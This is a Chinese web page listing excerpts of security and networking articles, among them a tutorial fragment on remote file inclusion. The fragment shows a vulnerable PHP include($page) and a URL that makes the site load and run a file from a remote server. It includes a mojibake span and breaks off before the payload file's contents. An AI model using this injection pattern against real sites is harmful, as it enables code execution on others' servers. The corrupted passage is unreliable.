摘要:
mrtg(multi router traffic grapher)是一个跨平台的监控网络链路流量负载的工具软件,目前它可以运行在大多数unix系统和windows nt之上。它通过snmp协议从设备得到设备的流量信息,并将流量负载以包含png格式的图形的html 文档方式显示给用户,以非常......
摘要:
作者:陶冶(无邪)
mail:taoy5178@hotmail.com
oicq:24149877 from:网络技术 在windows中,每个进程都有自己独立的地址空间,这样一个应用程序就无法进入另一个进程的地址空间而不会破坏另一个进程的运行,这样使得系......
远程文件包含漏洞的利用
**************************** 【程序编程相关:
类自启动病毒QQ乐Worm/QQMsg.】 【推荐阅读:
木马技术:网络安全之特洛伊木马的攻防战略】*author:cracklove * 【扩展信息:
木马病毒清除的通用解法】 *ema!l:cracklove#zj.com * *homepage:n/a,maybe down * **************************** 1)什么是远程文件包含漏洞? 让我们先看看以下代码, <? <!--- codz --->
include($page);
<!--- codz ---> ?>
由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量, 以web权限执行远程文件.
2)漏洞的初步应用 假设某一站点的index.php代码如下 <? <!--- codz --->
include($page);
<!--- codz ---> ?> 我们就可以提交: http://siteurl.tld/index.php?page=http://远程服务器/文件名称 假设? 颐窃冻涛募莆獁arez.php,内容为 <? ...
下一页 摘要:
★nix下的缓冲区溢出深度防御体系文/ayazero www.ph4nt0m.orgcontact:zhaoyan@nsfocus.comversion:2004/10/05 draft
+-----------------------------------------------......
